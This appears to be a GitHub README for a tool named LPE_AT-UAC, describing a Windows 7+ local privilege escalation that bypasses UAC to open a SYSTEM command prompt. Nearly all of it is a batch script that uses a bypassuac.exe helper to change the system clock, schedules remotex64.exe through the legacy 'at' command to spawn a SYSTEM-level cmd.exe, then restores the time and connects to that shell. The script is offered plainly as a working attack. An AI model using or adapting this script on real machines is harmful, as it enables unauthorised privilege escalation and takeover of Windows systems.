Skip to content

Latest commit

 

History

History
22 lines (17 loc) · 615 Bytes

README.md

File metadata and controls

22 lines (17 loc) · 615 Bytes

LPE_AT-UAC

Windows 7+ Local Privilege Escalation AT - BypassUAC

How to open a local NT/SYSTEM prompt shell "cmd.exe" on Win7+ through the oldschool "at" method.

atuac.bat content :

@echo off
set BYPASSUACPATH=C:\bypassuac.exe
set REMOTEPATH=C:\remotex64.exe
set tmptime=%TIME%
%BYPASSUACPATH% /c time 13:37:57,44
%BYPASSUACPATH% /c at 13:38 %REMOTEPATH% /s cmd SYSCMD
ping 127.0.0.1 -n 3 > NUL
%BYPASSUACPATH% /c time %tmptime%
%REMOTEPATH% /c %COMPUTERNAME% SYSCMD